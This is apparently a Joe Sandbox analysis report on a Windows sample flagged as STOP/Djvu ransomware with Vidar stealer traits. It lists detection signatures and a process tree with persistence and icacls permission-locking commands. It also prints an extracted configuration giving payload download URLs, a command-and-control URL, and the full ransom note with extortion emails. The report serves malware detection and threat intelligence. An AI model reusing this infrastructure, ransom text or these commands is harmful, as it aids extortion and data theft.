Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
E0tabE4K4r.exe

Overview

General Information

Sample name:E0tabE4K4r.exe
renamed because original name is a hash value
Original sample name:9a880d7572486dd985ed6ffbf55eee8875077d9614befc12d5fbdaafd45e86d5.exe
Analysis ID:1373019
MD5:9de69c7a3e551dcbc9208221099680a7
SHA1:e5ae2554407774c2cbbdde1c1dca1b15d51b6d20
SHA256:9a880d7572486dd985ed6ffbf55eee8875077d9614befc12d5fbdaafd45e86d5
Tags:exeStop
Infos:

Detection

Babuk, Djvu, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found stalling execution ending in API Sleep call
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • E0tabE4K4r.exe (PID: 6708 cmdline: C:\Users\user\Desktop\E0tabE4K4r.exe MD5: 9DE69C7A3E551DCBC9208221099680A7)
    • E0tabE4K4r.exe (PID: 412 cmdline: C:\Users\user\Desktop\E0tabE4K4r.exe MD5: 9DE69C7A3E551DCBC9208221099680A7)
      • icacls.exe (PID: 1236 cmdline: icacls "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
      • E0tabE4K4r.exe (PID: 5172 cmdline: "C:\Users\user\Desktop\E0tabE4K4r.exe" --Admin IsNotAutoStart IsNotTask MD5: 9DE69C7A3E551DCBC9208221099680A7)
        • E0tabE4K4r.exe (PID: 6744 cmdline: "C:\Users\user\Desktop\E0tabE4K4r.exe" --Admin IsNotAutoStart IsNotTask MD5: 9DE69C7A3E551DCBC9208221099680A7)
          • build2.exe (PID: 7464 cmdline: "C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe" MD5: C4070DA9F9B0581171AF16E681CCDFF8)
            • build2.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe" MD5: C4070DA9F9B0581171AF16E681CCDFF8)
  • E0tabE4K4r.exe (PID: 5296 cmdline: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe --Task MD5: 9DE69C7A3E551DCBC9208221099680A7)
    • E0tabE4K4r.exe (PID: 7304 cmdline: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe --Task MD5: 9DE69C7A3E551DCBC9208221099680A7)
  • E0tabE4K4r.exe (PID: 7580 cmdline: "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart MD5: 9DE69C7A3E551DCBC9208221099680A7)
    • E0tabE4K4r.exe (PID: 7636 cmdline: "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart MD5: 9DE69C7A3E551DCBC9208221099680A7)
  • E0tabE4K4r.exe (PID: 7868 cmdline: "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart MD5: 9DE69C7A3E551DCBC9208221099680A7)
    • E0tabE4K4r.exe (PID: 7888 cmdline: "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe" --AutoStart MD5: 9DE69C7A3E551DCBC9208221099680A7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Djvu

{"Download URLs": ["http://brusuax.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-99MNqXMrdS\r\nPrice of private key and decrypt software is $1999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $999.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0840ASdw", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\\/sWjMd\\\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7vAvQJa0bzVOF1YKNM9ycEaFo3i1IYPt\\\\nxz\\/jq68R20b+hkZtNTv54hcU7\\/Ez+0pdyzteV5Zhg7wXU130hV2tpLc73CPJWPbH\\\\n1Cb\\/TPj2BV1MyBjdQNygBMKZXr5AiecEZscmy3tPXp6G+PWkUj06eqE1m7OGGguB\\\\n99Z7DX1\\/1zY5jmMj5lpDmJWwWf7WaMni1yYPeNWGd67CNvvOmb+YjuTg4HXMAgQ2\\\\nWnCip4mCf70IqmZ2U\\/J0OUQFuCkNaQb0Q0aLFcT4bMDszWR\\/xOhuh2YWJQ0LO+gm\\\\nJQIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    00000013.00000002.1480717664.0000000002220000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1229632028.000000000210A000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      Click to see the 52 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      16.2.E0tabE4K4r.exe.22d15a0.1.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        16.2.E0tabE4K4r.exe.22d15a0.1.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        16.2.E0tabE4K4r.exe.22d15a0.1.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
        • 0xfd288:$x1: C:\SystemID\PersonalID.txt
        • 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
        • 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\
        • 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
        • 0xfd6ec:$s1: " --AutoStart
        • 0xfd700:$s1: " --AutoStart
        • 0x101348:$s2: --ForNetRes
        • 0x101310:$s3: --Admin
        • 0x101790:$s4: %username%
        • 0x1018b4:$s5: ?pid=
        • 0x1018c0:$s6: &first=true
        • 0x1018d8:$s6: &first=false
        • 0xfd7f4:$s7: delself.bat
        • 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
        • 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
        • 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
        16.2.E0tabE4K4r.exe.22d15a0.1.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          16.2.E0tabE4K4r.exe.22d15a0.1.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          Click to see the 55 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.11211.40.39.25149708802020826 01/11/24-13:35:01.763362
          SID:2020826
          Source Port:49708
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.11211.40.39.25149708802036333 01/11/24-13:35:01.763362
          SID:2036333
          Source Port:49708
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.11109.175.29.3949710802833438 01/11/24-13:35:01.710262
          SID:2833438
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: E0tabE4K4r.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://zexeq.com/files/1/build3.exe$runURL Reputation: Label: malware
          Source: http://zexeq.com/files/1/build3.exe$runlAvira URL Cloud: Label: malware
          Source: http://zexeq.com/test1/get.phpMhAvira URL Cloud: Label: malware
          Source: http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F_gAvira URL Cloud: Label: malware
          Source: http://zexeq.com/test1/get.phpAvira URL Cloud: Label: malware
          Source: http://zexeq.com/files/1/build3.exeLAvira URL Cloud: Label: malware
          Source: http://brusuax.com/dl/build2.exeAvira URL Cloud: Label: malware
          Source: http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=truebAvira URL Cloud: Label: malware
          Source: http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9FAvira URL Cloud: Label: malware
          Source: http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=trueAvira URL Cloud: Label: malware
          Source: http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9FwfAvira URL Cloud: Label: malware
          Source: http://brusuax.com/dl/build2.exe%Avira URL Cloud: Label: malware
          Source: http://zexeq.com/files/1/build3.exe0Avira URL Cloud: Label: malware
          Source: http://brusuax.com/dl/build2.exe$runAvira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeAvira: detection malicious, Label: TR/AD.InstaBot.yzesy
          Found malware configuration
          Source: 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://brusuax.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-99MNqXMrdS\r\nPrice of private key and decrypt software is $1999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $999.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0840ASdw", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeReversingLabs: Detection: 89%
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeReversingLabs: Detection: 37%
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\build2[1].exeReversingLabs: Detection: 37%
          Multi AV Scanner detection for submitted file
          Source: E0tabE4K4r.exeReversingLabs: Detection: 89%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: E0tabE4K4r.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext,2_2_00411178
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040E870
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext,2_2_0040EA51
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040EAA0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext,2_2_0040EC68
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00410FC0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,6_2_0040E870
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,6_2_0040EAA0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,6_2_00410FC0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00411178 CryptDestroyHash,CryptReleaseContext,6_2_00411178
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040EA51 CryptDestroyHash,CryptReleaseContext,6_2_0040EA51
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040EC68 CryptDestroyHash,CryptReleaseContext,6_2_0040EC68
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ76_2_00419E70
          Source: E0tabE4K4r.exeBinary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7

          Compliance

          barindex
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeUnpacked PE file: 2.2.E0tabE4K4r.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeUnpacked PE file: 6.2.E0tabE4K4r.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeUnpacked PE file: 13.2.E0tabE4K4r.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeUnpacked PE file: 15.2.build2.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeUnpacked PE file: 17.2.E0tabE4K4r.exe.400000.0.unpack
